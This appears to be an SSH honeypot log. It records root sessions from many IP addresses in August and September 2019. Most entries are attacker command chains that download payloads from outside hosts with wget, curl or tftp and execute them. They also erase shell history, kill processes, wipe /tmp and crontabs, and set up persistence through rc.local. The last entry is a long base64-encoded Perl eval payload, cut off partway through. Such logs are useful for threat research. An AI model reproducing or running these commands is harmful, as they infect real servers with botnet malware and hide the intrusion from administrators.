Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /tmp;rm -rf zyk;echo 'wget -q --timeout=20 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 20 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk plmx' >>plmx;chmod +x plmx;./plmx >/dev/null 2>&1 &

uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /tmp
rm -rf zyk
echo 'wget -q --timeout=20 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 20 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk plmx' >>plmx
chmod +x plmx
./plmx >/dev/null 2>
1

From 31.30.120.136 19-Aug-2019 12:32:56 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /tmp;rm -rf zyk;echo 'wget -q --timeout=20 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 20 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk plmx' >>plmx;chmod +x plmx;./plmx >/dev/null 2>&1 &

uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /tmp
rm -rf zyk
echo 'wget -q --timeout=20 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 20 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk plmx' >>plmx
chmod +x plmx
./plmx >/dev/null 2>
1

From 81.199.122.52 19-Aug-2019 16:40:37 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://systemservice.hldns.ru/bin.sh || curl http://systemservice.hldns.ru/curl.sh -o curl.sh || tftp systemservice.hldns.ru -c get tftp.sh || tftp -r tftp.sh -g systemservice.hldns.ru; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://systemservice.hldns.ru/bin.sh || curl http://systemservice.hldns.ru/curl.sh -o curl.sh || tftp systemservice.hldns.ru -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 86.122.23.35 19-Aug-2019 18:49:18 ssh2 root
ls wget 
wget nasapaul.com/ninfo 
ls
history

From 151.38.162.122 20-Aug-2019 14:52:18 ssh2 root
s
ls
w
nano reglas.pl
cat regas.pl
wget
wget nasapaul.com/ninfo.pl
s
nproc
nvidia-smi
cat /proc/cpuinfo
scpu
lscpu
passwd
adduser
useradd
yum
cd
s
cd /home
s
ls
halt
kill -9 -1
kill -1 -9

From 222.121.135.68 23-Aug-2019 20:22:43 ssh2 root
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
passwd
yum
apt
apt install

From 222.121.135.68 23-Aug-2019 20:23:39 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
ls
clear
sa
cd /var/tmp
wget nasapaul.com/ninfo

From 222.121.135.68 23-Aug-2019 20:24:07 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
perl nfinfo
halt
ls

From 222.121.135.68 23-Aug-2019 20:24:36 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
ls
clear

From 82.44.38.115 23-Aug-2019 20:26:28 ssh2 root
ls
clear
lscpu
wget nasapaul.com/ninfo
ifconfig

From 93.118.203.97 23-Aug-2019 20:27:05 ssh2 root
passwd
clear
passwd
cls
apt
sudo
yum
ls
nproc
wget fanelishere.tk/info
ls
curl -O fanelishere.tk/arhive/info
wget fanelishere.tk/arhive/info
ls
halt
ls
pwd
ls
exit

From 109.98.132.55 24-Aug-2019 03:06:07 ssh2 root
ls
w
cd
ls
cd /hme
l
ls
cd
ls
cat /etc/issue
wget nasapaul.com/ninfo
perl ninfo
yum
apt
apt-get
aptt-get install perl

From 37.81.244.232 2-Sep-2019 16:07:38 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.61.199/bin.sh || curl http://46.246.61.199/curl.sh -o curl.sh || tftp 46.246.61.199 -c get tftp.sh || tftp -r tftp.sh -g 46.246.61.199; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.61.199/bin.sh || curl http://46.246.61.199/curl.sh -o curl.sh || tftp 46.246.61.199 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 167.114.3.141 4-Sep-2019 02:37:12 ssh2 root
w
top
exit

From 52.178.180.220 6-Sep-2019 02:57:24 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.61.199/bin.sh || curl http://46.246.61.199/curl.sh -o curl.sh || tftp 46.246.61.199 -c get tftp.sh || tftp -r tftp.sh -g 46.246.61.199; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.61.199/bin.sh || curl http://46.246.61.199/curl.sh -o curl.sh || tftp 46.246.61.199 -c get tftp.sh || tftp -r tftp.sh -g 46.246.61.199
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 109.166.130.87 7-Sep-2019 06:31:06 ssh2 root
history -c
w
uname -a
nproc
cat /proc/cpuinfo
ps x
ls -a
passwd

From 109.166.130.87 7-Sep-2019 06:36:45 ssh2 root
history -c
cd /tmp
ls -a
wget escoaladesoferi@scoaladesoferi.ucoz.net/muhs.jpg
yum install wget

From 193.112.241.87 7-Sep-2019 16:25:31 ssh2 root
/etc/init.d/iptables stop wget http://185.149.23.206/mips chmod 4755 mips nohup /root/mips > /dev/null 2>
1
chattr +i mips
chattr +d mips
$ nohup mips
echo "./mips
">>/etc/rc.local exit

From 31.30.120.136 10-Sep-2019 06:33:26 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /tmp;rm -rf /tmp/.zx;rm -rf /tmp/.*;rm -rf /tmp/*;crontab -r;pkill lvmetad;pkill rsync;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/ba2 || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/ba2;chmod +x ba2;./ba2 >/dev/null 2>&1 &

uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /tmp
rm -rf /tmp/.zx
rm -rf /tmp/.*
rm -rf /tmp/*
crontab -r
pkill lvmetad
pkill rsync
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/ba2 || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/ba2
chmod +x ba2
./ba2 >/dev/null 2>
1

From 45.55.157.147 10-Sep-2019 21:48:37 ssh2 root
Exec uname -a

uname -a

From 37.187.114.144 11-Sep-2019 19:46:34 ssh2 root
Exec echo -e "Uname: $(uname -a)\nCPU_name: $(lscpu | grep "Model name" | cut -d : -f2)\nCPU_number:$(nproc)\nName:$(cat /etc/*release | grep "PRETTY_NAME=" | cut -d "\"" -f2)\nShell:$SHELL\nUptime:$(uptime)\nBash:$(if [[ $(bash --version | head -1 | cut -d " " -f 4) != 0 ]]; then     echo OK; else     echo HONEYPOT; fi)"
echo -e "Uname: $(uname -a)\nCPU_name: $(lscpu | grep "Model name" | cut -d : -f2)\nCPU_number:$(nproc)\nName:$(cat /etc/*release | grep "PRETTY_NAME=" | cut -d "\"" -f2)\nShell:$SHELL\nUptime:$(uptime)\nBash:$(if [[ $(bash --version | head -1 |
then echo OK
else echo HONEYPOT
fi)"

From 5.135.182.185 12-Sep-2019 16:25:50 ssh2 root
Exec uname -mn
uname -mn

From 14.36.38.111 14-Sep-2019 01:26:16 ssh2 root
Exec wdir="/bin"
for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"
do
if [ -w $i ]
then
wdir=$i
break
fi
done
cd $wdir
curl http://220.93.118.126/21.bin -o sadskhwes0
chmod +x sadskhwes0
./sadskhwes0
wget http://220.93.118.126/21.bin -O sadskhwes1
chmod +x sadskhwes1
./sadskhwes1
good http://220.93.118.126/21.bin -O sadskhwes2
chmod +x sadskhwes2
./sadskhwes2
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
cat /dev/null >/root/.bash_history
ls -la /etc/daemon.cfg
exit $?

wdir="/bin" for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc" do if [ -w $i ] then wdir=$i break fi done cd $wdir curl http://220.93.118.126/21.bin -o sadskhwes0 chmod +x sadskhwes0 ./sadskhwes0

From 104.248.134.3 16-Sep-2019 10:35:24 ssh2 root
Exec uname -a ; cat /etc/os-release
uname -a
cat /etc/os-release

From 157.230.39.152 21-Sep-2019 00:39:15 ssh2 root
Exec cd /tmp || /var/tmp || /dev/shm; echo "ZXZhbCB1bnBhY2sgdT0+cXtfIkZVWSgiMVA8Rl1DOTctUztSYF0oIj1SPFdFTjhSPFsiQEhEPFY1Uj1GRUQ7VyhdKVMkVC1CWFEuIzROLDM8UStDKFItUjxAPTZZTDk3LVMoIjFTXzk3KVY6NjFPPENMKjs3REApJyFPPEcxQS8yPFQtIyxHLlBJTT4yIWA4ViVOODZFUy8yQEIoVyFQKEJEWyJGVVkoJCFBOSZVUy8yQEIwMihMKEVAQl8qM0wqOzdEQDAmJVU9JkBdKiIpTDtWLUE7JkFPPFcwQiozTCoiRlVZKCIxTDo2WUE8VV1NODdAXS1DTCo7N0RAKSctTDk2NVAvMyxbIkBJTT4yYERfO0ZFQzpSYF0oJj1FPSZZSThWTEgqM0wqOzdEQCkmRVI4VllBOzY0QC8yIUc5NzFOOjYtSyoiRFsiRlVZKCIxUjk2JUw7RiVNOTJgXSgiQUA9NllBXzs2NEArNiVAKjNMKiJGVVkoIjFBOFY1UzxWXVM6JjVMOyJgXSgjJFsiRlVZKCIxUDxGNUY6N0FPKCNUQChCJEAoQ0wqOzdEQCkmNVM9JiVUOjctVF86Ni1BPFJgXSgjYFsiRlVZKCIxUDg2LU89JjVTKCNUQCwzTCoiRlVZKCIxNjE1KTMwNFxALzJgRywiWFI4MjxbIkBIRDRURSc+Uj0pM0UwRz8yYF1fKCI9KTFUWS80RDRHLlBIRDRURSc+Uj0oNTVgRz8yYF0oIj0pMVRZLzRENEcuUEhENFRFJz5SPTQxNSktKVdUQC8yYEcyND0uM1UpJSlTTCopJS0pXzFXTEcwVEEsMSI9XSgjVEApVEUnM0RdMjEyPFsiQjEzMjQ9WylVITMpV1RALzJgRzI0PS4zVSklKVNMKiJHNVM5MiEpM1NIWjRWXUM6VjVULlBJVV88VjRANFZdQzpWNVQuUElVPFY0QDI0XFouRS1FOyY1Qz0jTCo4VkFEOjcoSChCXEIqM0wqKSctRTxHOUk5Jl1SLzIoRDA1KSc1RUxQNzIoQDo2OEBfKSQlMjFVOTssJVRbIkIwUC8yKEQ8JylPOFY1UzxWXEIrQik8LCIoWyJGVVkoIjFQOjYwXTlGXVI6U0wqOTdBST0iIUk5QmBEPCZFRC5QSUQ6NjRAXyhFIVI7VilMOTZVQSgmLU87MiFPKCY5TzxGTFooIjBBKEIhVTtGUUU8VyxAOSY1Rjo2WUU5IkBEPCZFRCozTCoiRlVZKCI1STxGLT88VjVSPUY1Ul88U0wqOzdEQCk0MSMwU0wqOzdEQCkmMUM4VV1TOTZQQC8yIU45NzxAMjRcWi5FLUU7JjVDPSJUXjtGNVcqIkRbIkBIKiJASVM9NihAOVY1VDtGRUNfOlIhWyJCYEA8RjVUPTcpTigiKVgoQllJO0cwSDxGJU45IkBZLjNEWSoyRE4oQlRCK0ZFTj0iQVI4NllEKiNEWS4zREkqM0wqPzBIKiJHLVU4QiFHXzk3MUk5JjVOPSIhWyJCYEA7N0RAKScpRT0mXVI7Rl1JOSY1Tj0iYF0oIjk/OVY1VCoiKUg9JzFQLkJcTz1XPVcrRlVJO0chTzwiWUM7VlRPPFZMUV8sRyFBOFZMTzo2MUU7RzFTK0chSDwiKEkuUEhAKCZVWSgiMUk5JjVOPSYtSDg2WUM5MmBdKCZFTj0iQVI4NllEKiMkUCwjYEkqM0wqKCIhSTlCYEhfKSZFRDk2WVQ4VkFBO0YtRSgjWEAsU2BJKCdMKigiYEAoIiFSOTcxVTxGWEApJllJOFZMWyJCYEA/MiFFOyctRSgnTCooImBAKCIhUjk3MVU8RlhAXyknKUU9Jl1SO0ZdSTkmNU49I0wqKCIhXSJCYEA8RjVUPTcpTigiMVI5NzFPPEZZTzo2MUU7RzBbIkdUKiJHLVU4QiFHOTcxTjg2VUUoJ0wqKCIhTV8+MmBEPEY1VDtXKU47VllBOzY0QC8yYEY3Vj1FPSJAQjonMVQ8I0hPK1c9Vz1SWU06NllQO1dgTjhWXU0rVy1LLDMpUDg2LUsrVllBOzY1UytHIUhfPCIoSS5QSEAoJylFPSc1UjtCYEQ8RjVUO1cpTjtWWUE7NjRbIkdUKiJHLVU4QiFHOTcxSTkmNU49IyhAPlBIQCgiYEAoImBAKCZVWSgiMUw5NllHXz0mQF08VkFJOUcwWyJCYEAoImBAKCJgQCkmUUU7Rj1UOiJgXSgjLEA6NjhAKiIxTDk2WUc9JkBALyJgUyozTCoiQmBAKCJgQCgiYEA7N0RAMCYtSF84NylTLzJARzgyPE4rQj1aKVJQRzAyPE4rQj06KVJQRywyPE4rQjxZKVJEWyJCYEAoImBAKCJgQDlGXVI5NiVDOiJgSCwyWE4pJlFFO0Y9VDoiRCpfKCJgQCgiYEAoIiFbIkJgQCgiYEAoImBAKCJgQCgiYEAoImBEPEYlTjkmXU08VzFSOjZZRytDVEQ4VkFBPEctOzxGJU45IiFgOFZBQTxHLT0uUEhAXygiYEAoImBAKCdUKigiYEAoImBAKCIhUjk3MVU8RlhAKScpQTtGMU87Ny1UPEZFTjlTTCo/MEgqPFc1QigmPUU9Jy1UO1cpRSgiQEQpIkQqPlBIQF8oJlVZKCIxVTxGUEAvMiFTOiZFRj0jTCooIiFNPjJgRDlGRUw5MmBdKCctSDo2OVQuUEgqKCJgRDonMVQ8JV1TPScpRTg2VT87VzVUKCNUQCwzTCpfKCIhTzwmNU4qJD0lNSVdLzU1MSYyNFElKyJgQi9CYEQ5RkVMOTIoSS5QSEAoIjVIPScxUDdWUU87VyE/OFZBRThWTEAvMmBIKjNMKigiIT85VjVUXyoiMVU8RlBJLlBIQCgmLUw7Vy1FKCQ9JTUlXS81NTEmMjRRJS5QSEAoJylFPSc1UjtCYEQ7NiVJO0NIWjonMVQ8JV1HOTcxPzxGNVM9NlFULlBJXV8iQElTPTYoQDdWPUU9YElbIkJgQDs3REApJzVSOyJgXSgnLUg6NjlULlBIQCgmVVkoIjFQPEZdWD4yYF0oIihCLlBIQCgmPVI5N2BAPlJBTDhSQERfN1JEQDk3JEAoRkFUPSchPzwnKU8+J0RCKjJgRilCYEgpJyFSO1dBWSgjVEApJDUuNUdMRDdXVEk/MiFLOTdFUygiNSUzRThbIkJgQDo2OEAqIkBEXzwnKU8+J0RAOTckQChCKEkoIjhGKCIxVTxGUEAvN1hAOzJRPjonMVQ8I0hPK1JBOzdCXFo3MkxJKiNcWi5CQTw5IkxJKjNcSCtVUTMqQkRfKSJQSV8oJ0wqKCJgQCgmVVkoIjFIO1ctVCgjVEApIyRbIkJgQCgiIU0+MmBEPCZdUj0iYF0oIjBSKCdRXCgjQFAuUEhAKCJgQDs3REApJyFBPSZAQC8yYERfLFNMKigiYEAoIjFQODcxSCgjVEAoQlxCKCc1TjsmNVM8UiFEOTY5STtGNUQqIjFQODcxSCozTCooImBAKCcpRT0nNVI7QiE/PScpST1GRUE7JV1IXz0nMVA3Vj1FPSJARDomXVM9IlBAKSchTzxHMEwoIjFQODcxSCozTCooIiFdKCY1TDxWRUYoIkBEPCcpTz4nREAvN1hAOzJRPjonMVQ8I0hPK1JBO183QlxaNzJMSS5CQTw5IkxJKiJdPDRSSEkvUjBMKjIhWyJCYEAoIiFNPjJgRDomXVM9ImBdKCIwUS5QSEAoImBAOzdEQCknIU88RzBALzJgRCxDTCpfKCJgQCgmVVkoIjFQODcxSCgjVEApJzVSOyNMKigiYEAoJylFPSc1UjtCIT89JylJPUZFQTslXUg9JzFQN1Y9RT0iQEQ6Jl1TPSJQQCknIU88RzBMXygiMVA4NzFIKjNMKigiIV0oJjVMPFY0QD5QSEAoImBAPEY1VD03KU4oJzVOOSY1Ri5QSEAoJ1QqPzBIKiJHLVU4QiE/PScpST1GRUE7JV1IPScxUF83Vj1FPWBJWyJCYEA7N0RIKSZBTzxXMEwoIjFQO1cpVCsiYEQ8JiVUOiJEQC8yIWA3U0wqKCIhTT4yQEQwND0lM0UwTCgiMTYxNSkzMjRdLisiYERfPCJEWyJASEAoIjEhMVQ1LjUiYF0oIilHOTcwTTs2RU46NlVBOyIoWyJCYEApJTklNEUtKTNUWEAvMmBCLENgUCwjYFEsM0BCLlBIKigiYEQ8JiVUXzoiYF0/QiFTK1JgTykzKFArVjxbIkBIQCgnKUU8NzVJPEY0QDI0XFouRS1POFZNRT0jTCooIiFMO1YtQTsiQEQ3RTxJKCNUQCwjTCooIiFNPjJgRF88Vl1DOlJgXSgkRS8uQ0kzO1YtSzk3MFouREUuMTUwTS9GWUU9UkEwOTY1UjA2MUQ8QmBdL0JgRDomXVM9IlAqKCJgQCgiYEAoImBAKCJgQCgiYEBfKCJgQCgiYEAoImBAKCJgQCgiYEAoImBAKCIhMDk2NVI0Jl1SPSJgXS9CYEQ8Jl1SPSJQKigiYEAoImBAKCJgQCgiYEAoImBAKCJgQCgiYEAoImBAXygiYEAoImBAKCJgQCgiITA8Rl1UO1JgQCgjVF4oIj1UOFdgRytgSEAoImBAKCJgQCgiYEAoImBAKCJgQCgiYEAoImBAKCJgQCgiYEAoImBAKCJgQF8oJTFJOzY1Tz03MEAoI1ReKCM4UCoyIVw/IiFSOTcxVTxGWFsiQmBAKSctTzhWTE0vRiVVPSZdRjsnNVM6I0wqKCIhTT4yYEQ7RjVUOyZdQygjVEBfKSZBTzxXMFsiQmBAKSZZRT0mUU84UmBOLzJgQi5CMVA7VylUKEIhSTlCYEQ8Jl1SPSJgQS8yYFgsI0wqKCIhTT4yYEQ8RjVRPTY1Uz0iYF0oIiknXzE1MEApJyFBPSZAQDIlMTQ0IlxRK0MhPCwjJFU3I2BRLEIoKigiYEAoImBAKCJgQCgiYEAoImBOKCIpKDtXLVQuQmBEO0Y1VDsmXUM3I2BRLTVQUF8sMyhCIkJgQCgiYEAoImBAKCJgQCgiYEArQmBCNTctRTxCVSE5VjVOPSNIQCkkJScxNFk0K1IxNjE1KTMyNF0uK1c1PCwjJFU3I2BRLEIoWyJCYEBfKScpRTw3NUU8VzBAK0NUQChFIVI4Nj1NODNIQDtGXE04ViVDOiY1PCwjJFU3I2BRLEIoQDo2OEAqIjFNODZFTi5DSUg9JzFQN1ZZTzdWLUE4VkFFXyozTCooImBEPEY1UT02NVM9ImBOLzJgQjcjYFEtNVBQLDMoQi5QSEAoJyFSOjZZVCgiMVM7Vi1LKCIxUjk3JVU5Ny1ULlBIKigiIU0+MmBEOEc1Rl8oI1RAKEIoWyJCYEA7N0RAKSZYWyJCYEA7N0RAKSYoUSgjVEAoQihbIkJgQD1WQUk7JjRAKiIxTigjVEA8V0VTPEY1QTkiQEQ8Vl1DOlJQQCkmKVVfOUJQQC4iSFEsIyhUKyIhTDk2WUc9JkBIKSYpVTlCREkqMiFbIkJgQCgiIUk5QmBIKSYoUSgmNVEoIihCKjIhWyhgSEAoImBAKCJgRDhDJEAvMmBEXzhHNUYuUmBAKCJgQCgiYEAoYEhAKCJgQCgiYEQ4RzVGKCNVXignLE8rQkxfNyNgUS0zXTwsIyRSNyNgUS0zXTwsIyRSK1JdUy5SYEAoImBAKGBIQF8oImBAPzBIQCgiYEA6NjhAKiIxSD0nMVA3Vy1UPEY1QTs1XU89NzBJKCdMQDwnKUk7RzBAMVQ1NDdUXTU1JDkpMyQ0QCkmKVU5Q0xAKSYpVTlCYF1fKCIoQi5SIV0iQmBAPzBIQCgnKUU9JzVSO0IhVTtGMUU5QiFVO0ZRRTxXLEA5JjVGOjZZRTkiQEQ7QkRbIkBIQCgiMU04NkVOLkNJSD0nMVA3Vj1FXz0lXVI5Ny1VOycwQC8yYFIsI2BbIkJgQDo2OEAqIjFCLDJgXT9CIU0rJVkoNSUxMCtVUUQqVVBONyYwSzcnLEsqJVFEKlJFOzdFUFAsMyk9KkVQUF8sMyhMKjIhWyJCYEAoImBEOzYlSTtDSFo6JzFUPCVdRzk3MT88RjVTPTZRVCgjVEApIyRbIkJgQCgiIUk5QmBIKSZVQTo2WFouRkFUPSchPzlWNVRfN1cpRTxXNUw9ImBdP0JgTzdDLFA2UyRSLFM9PStSYEYpQmBEOEMkQC83WEArVVBQLDMpLDtWLUE9JkVPO0NJPDxSSEg3JSxLKjJcKioyIVsiQmBAXygiYEAoJlVZKCIxVTxGUEAvMmBELDNMKigiYEAoImBAPEY1VD03KU4oJzVOOSY1RigmRUYoIjFIPScxUDdWUU87VyE/OFZBRThWTVspJzVSOydUS18qU0wqKCJgQCgiYEA8RjVUPTcpTiglXUc5NzBIKSc1UjsiRFsiQmBAKCIhXSJCYEAoIiFSOTcxVTxGWEA9NllEOTY4QD02WUw5Ny1TKCIxTTg2RU5fLkNJSD0nMVA3Vj1FPSVdUjk3LVU7JzBALzdYQCtVWFIrU0wqKCIhXSJASEAoJylFPSc1UjtCYEQ4RzVGLlBJXSJASCopJy1FOyVdQzsmRUU7RzFFXygjVEAyNFxaLkUtRTsmNUM9IlReO0Y1VyoiRFsiRy1VOEIhUzk2WUQ8RiVXKCdMKigiIUk5QmBIKSItPygjVF0oIjxRKVJEQD5QSEAoImBAOzdEQF8pJy1POFZNRT0iYF0oIjE/NlMhPS5QSEAoImBAPCcpSTtHMEApJy1POFZNRT0iYEIpJV07LDVVPDtCKFsiQmBAPzIhRTsnLUUoJ0wqKCJgQCgiYEBfPCcpSTtHMEApJEUyMFVdQz03KT88Vl1DOlY1VCgiKEQ3VUxQNzVRTihDTCooIiFdIkdUKiJHLVU4QiFDO1ZZRThXMUE8QiFbIkJgQCgmVVkoIjFNXzk3NU46Ni1LKCNUQCklXTssJVRbIkJgQCgmVVkoIjFTOTcpVjo2MU88RV1DO1ZYQC8yYEQ3VUxRNzNMKigiYEA7N0RAKSchTzxHMUE3Vi1PO0JgXV8oIjE/NlMpPS5QSCooImBAOzdEQCkkRTIwVV1TO1YtSzk3MEAvMiEpM1NIWjRWXUM6VjVULkNJKTNENTQrM1lOOTc8SDQnKU89JlxdL0IpVDhXYEJfKyIhMDk2NVIwNjFEPENUXihCMVM5NylWOjYxTzxFXUM7VlhCKyIhMDk2NVI0Jl1SPSNUXiknIU88RzFBN1YtTztCREA7VyhAPEY1VD03KU4qIyRJXy5QSEAoIiFJOUJgSDkmNUY6NllFOSJARDI1KSM3Vy1POFZNRT0iREkoJ0wqKCJgQCgiYEQyNSkjN1YtVTxFXVM7Vi1LOTcwQC8yYEQyNSkjN1ctT184Vk1FPSNMKiJCYEAoImBAKSRFMjBVXVM7Vi1LOTcwTS9GJVU9Jl1GOyc1UzoiQFEqM0wqKCJgQCgiYEQ8VjVMN1YtTDo2NU49JjRNL0YlRDkiQERfMjUpIzdXLU84Vk1FPSJEWyJASEAoImBAKCIxSTxGLT88VjVSPUY1UjxXTEQyNSkjN1YtVTxFXVM7Vi1LOTcxXT5SPUg7Vy1UKVdUQC8yYEIpJy1FXzxHOUk5Jl1SN1YtTztCKFsiQmBAKCJgQCkmRVI4VV1TOTcpVjk3KVM+UjEpNEQtPzhXNVI3Vy1POFZNRT0nVVspVyFPPEcxQSlXVEAvMmBCKSchT188RzFBN1YtTztCKFsiQmBAKCJgQCkmRVI4VV1TOTcpVjk3KVM+UjEpNEQtPzhXNVI3Vy1POFZNRT0nVVspVllJOFZMRz8yYF0oIjFNOTc1Tjo2LUtfLlBIQCgiYEAoIjFJPEYtPzxWNVI9RjVSPFdMRDI1KSM3Vi1VPEVdUztWLUs5NzFdPlI9TTk3NUk8Ij1dKCNUQCkkRTIwVV1TO1YtSzk3ME0vRy1PXzhWTUg7Vy1ULlBIQCgiYEAoJllJOFZMSChCMU05NzVOOjYtSyhCRFsiQmBAKCJgQDxWNU45JylBPVJAQjU1LSU0QmBEOjcpQztGJU05MmBCK0IxKV80RC0/PFZdQzpWNVQrM1lTO1YtSzomXVM9IlhCKCIxUzk3KVY6NjFPPEVdQztWWEAuQjFSOTYlTDtGJU05MihJLlBIQCgiYEAoJy1MOTY1UCgjKFtfIkJgQCgnVCoiR1QqOzdEQCkmUUk7RjU/PSY1TTwjTCo9VkFJOyY0SCgjJEAqMiFbIkJgQCgnPUg6NlFFKCJAQSomTUU+NyxIKTZFUjhVXVM5NylWXzk3KVMqMkRJKCdMQDhWXU45Ni1UODcoSChCMU46Ni1LKEJQQChCMVM5NylWOjYxTzxCKEwoIihEPCZdUj0mJEIqM0xAPzBIQCgiIUQ5NlFFPSY0SF8pJkVSOFVdUzk3KVY5NylTPlI8Rz8yREA6NjhAKiYxRTlGRU45NjBIKSZFUjhVXVM5NylWOTcpUz5SPEc/MkRJLlBIQCgiYEYxJC0jLkNJQztWWU5fOTYtVDo2XU48U0wqKCJgQDs3REAwJylFODYxWSgjVEApJy1FOyVdQzsmRUU7RzFFKzNZQzg2WT88RjVBOSJAUCtDOEkuUEhAKCIhTjk3QVQoJzVOXzsmNVM8UkFgPEY1QTknREkuUEhAKCIhRjtXKUU4Ni1IKCIxRjoiYEgwJylFODYxWSoyIVsiQmBAKCJgQCkkRTIwVV1DPTcpPzxWXUM6VjVUKCNUQF8pJjlILlBIQCgiYEAoIjFNOTc1Tjo2LUsoI1RAKSZFUjhVXVM5NylWOTcpUz5SMSk0RC0/OFc1UjdXLU84Vk1FPSdVWylWWUk4VkxHPzNMKigiYEBfKCJgRDtHKUU4NjBALzIhUz43LVI5NiVEKiIxRjoiUEApJlVTOVJQQC0jYFktQkRbIkJgQCgiYEA6NjhAKiIxTjxGNUE5ImBdLzJgUCoyIVsiQmBAXygiYEAoImBAKSctRTslXUM7JkVFO0cxRSszWVI5NlVPPUY0SCkmOUgqM0wqKCJgQCgiYEAoImBEOUZATS9GLUw7Vy1FLlBIQCgiYEAoImBAKCYxRV87JjVUOTJARDo3KUM3Vy1FPEc5RTxHLVspJjlIPzJEWyJCYEAoImBAPzBIQCgiYEAoJCFMOjZZRTxSYF0oJy1QOyZFVCgiQE83JlhPKyJgRDs3LUdfKjNMKiJCYEAoImBAOUZdUiomVVkoIjFDLzNgWygiMUMvI1RAKSItTDo2WUU8U0xAKSYsSypSREA+UEhAKCJgQCgiYEApJlFJO0Y0QC8yYEQ7JkVOXzk3LTspJi09LlBIQCgiYEAoImBAKSZRSTtGNF0pJlFJO0Y1Pz0mNU08IlhEOyZFTjkyIUk5QmBIKSZRSTtGNT89JjVNPCJEWyJCYEAoImBAKCJgRF87JkVOOTVdVDk2VVAvMjxHLlBIQCgiYEAoImBAKSZRSTtGNEAvN1hAPFJdPDxCME8rU0wqKCJgQCgiYEAoJzVOOyY1UzxSYEgpJixALzNUQCkiLUxfOjZZRTxSREA+UEhAKCJgQCgiYEAoIiFQODcpUzkyQEIpJlFJO0Y0QiozTCooImBAKCJgQCgnVEA5NlFTOTIhWyJCYEAoImBAKCJgQCgiYEA6NjhAXyoiMEM7JkVOOTcsQC8zVEAsIkRAPlBIQCgiYEAoImBAKCJgQCgiYEA8JiVSPFY0SChCMUw6NllFKEJEWyJCYEAoImBAKCJgQCgiYEA/MiFFOyctSV85QmBIKSZRSTtGNVM2UjFDNzJgXT9CYE83JyhEK1JEQD5QSEAoImBAKCJgQCgiYEAoImBAKCIhUDg3KVM5MkBCKSZRSTtGNEIqM0wqKCJgQCgiYEBfKCJgQCgiIV0oJjVMPFZFRigiQEQ7JkVOOTJgXT9CYE83QkE8NFJMSSgkWS81JEUjMTIhITU1MSgoI0k8KkVQSjciSE8qMiFbIkJgQCgiYEAoImBAXygiYEAoImBAKCchQTxHLUUqIihEOyZFTjkyKEkuUEhAKCJgQCgiYEAoImBAKCdUQDk2UVM5MiFbIkJgQCgiYEAoImBAKCJgQCgiYEAoIjFMOjZZRV83VzFFOzdgQC8yYEQ7JkVOOTNMKigiYEAoImBAKCJgQCgiIV0iQmBAKCJgQCgiIV0iQmBAKCJgQCgnVCooImBAPzBJXSJASVM9NihAPCYlUjxWNEBfPlBIQCgiIU0+MmBEPFY1Uj1GJVI5UmBdKCctSDo2OVQuUEhAKCIhSTlCYEgpJy1FPEc5QTxGPEAvN1hAK1VZMDI0WScoJVBaKiJYSioyXEkoJ0wqXygiYEAoIiFTOTZZRDxGJVcqIikwM1RZJygjSEQsMihJLlBIQCgiIV0